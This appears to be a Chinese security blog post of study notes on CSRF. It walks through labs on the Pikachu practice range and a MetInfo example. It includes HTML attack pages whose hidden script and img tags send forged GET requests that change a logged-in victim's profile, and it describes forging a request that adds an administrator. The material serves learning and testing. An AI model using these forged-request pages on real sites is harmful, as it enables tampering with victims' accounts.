网络安全之CSRF&SSRF漏洞(上篇)(技术进阶)

目录

一,CSRF篇

二,认识什么是CSRF

三,实现CSRF攻击的前提

四,实战演练

【1】案例1

【2】案例2

【3】案例3

【4】案例4(metinfo)


一,CSRF篇

二,认识什么是CSRF

CSRF(Cross-site request forgery)简称:跨站请求伪造,存在巨大的危害性。是攻击者制造一个请求(一般是一个链接)诱导用户去点击,从而通过用户去访问正常的网站用攻击者伪造的请求去对网站发送一个请求。

三,实现CSRF攻击的前提

1,有这个漏洞(自己弄个号来攻击自己,成功了就说明有这个漏洞)

2,用户已经登录了

3,要知道协议包的结构(不然怎么伪造请求呢)

4,浏览器支持(如没有同源策略)

5,用户点击并打开恶意网站

四,实战演练

皮卡丘靶场为例:

环境:受害者为主机,虚拟机搭建恶意网站

在虚拟机中新建一个test.html,恶意网站代码为:

<script src='http://localhost/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=gg&phonenum=1111&add=
11111&email=111111&submit=submit'>
</script>

【1】案例1

2,提交后他打开了小黑子的恶意网站

【2】案例2

1,使用bp抓包生成CSRF攻击代码

2,将生成的代码复制到虚拟机的恶意网站中

3,去访问恶意网站后

 

【3】案例3

使用OWASP-CSRFT工具

1,设置浏览器代理

2,开启工具进行抓包

      

3,用户点击提交后得到数据包:

4,生成一个攻击用的html文档

文档内容:

<html>

<head>
<title>OWASP CRSFTester Demonstration</title>
</head>

<body>

<H2>OWASP CRSFTester Demonstration</H2>

<img src="http://localhost:80/pkq/vul/csrf/csrfget/csrf_get_edit.php?sex=nang&phonenum=66666666&add=6666666&email=666666&submit=submit&" width="0" height="0" border="0"/>

</body>
</html>

5,将生成的html文件放到恶意网站中

用户去访问恶意网站

【4】案例4(metinfo)

1,登录后台

2,新增管理员用户

3,开启抓包

4,将抓取到的包含要用的数据的包生成html文件 

5,把文件放入恶意网站中,用户去访问

 

 

以上就是我的学习笔记了,谢谢观看!!!

  • 15
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

佛渡有“缘”人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值